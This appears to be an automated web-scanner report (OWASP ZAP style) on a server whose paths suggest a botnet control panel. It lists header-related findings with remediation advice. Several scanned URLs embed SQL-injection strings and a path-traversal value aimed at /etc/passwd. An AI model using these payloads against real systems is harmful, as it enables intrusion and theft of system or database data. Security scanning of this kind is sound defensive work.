Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
Instances 27
Solution
Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.
Reference https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework
https://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html
Tags OWASP_2021_A01
WSTG-v42-INFO-08
OWASP_2017_A03
CWE Id 200
WASC Id 13
Plugin Id 10037
Low
Server Leaks Version Information via "Server" HTTP Response Header Field
Description
The web/application server is leaking version information via the "Server" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.
URL http://142.202.242.172
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 626 bytes.
Request Body - size: 0 bytes.
Response Header - size: 241 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 441 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 389 bytes.
Response Body - size: 131 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=&params=*&task_select=8&unit_EXEC=18.9
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 709 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 468 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 972 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method POST
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 479 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
Instances 54
Solution
Ensure that your web server, application server, load balancer, etc. is configured to suppress the "Server" header or provide generic details.
Reference https://httpd.apache.org/docs/current/mod/core.html#servertokens
https://learn.microsoft.com/en-us/previous-versions/msp-n-p/ff648552(v=pandp.10)
https://www.troyhunt.com/shhh-dont-let-your-response-headers/
Tags OWASP_2021_A05
OWASP_2017_A06
WSTG-v42-INFO-02
CWE Id 200
WASC Id 13
Plugin Id 10036
Low
X-Content-Type-Options Header Missing
Description
The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.
URL http://142.202.242.172
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter x-content-type-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
Instances 29
Solution
Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.
Reference https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)
https://owasp.org/www-community/Security_Headers
Tags OWASP_2021_A05
OWASP_2017_A06
CWE Id 693
WASC Id 15
Plugin Id 10021
Informational
Authentication Request Identified
Description
The given request has been identified as an authentication request. The 'Other Info' field contains a set of key=value lines which identify any relevant fields. If the request is in a context which has an Authentication Method set to "Auto-Detect" then this rule will change the authentication to match the request identified.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter username
Attack
Evidence password
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter username
Attack
Evidence password
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter username
Attack
Evidence password
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter username
Attack
Evidence password
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter username
Attack
Evidence password
Request Header - size: 1,056 bytes.
Request Body - size: 154 bytes.
Response Header - size: 216 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter username
Attack
Evidence password
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
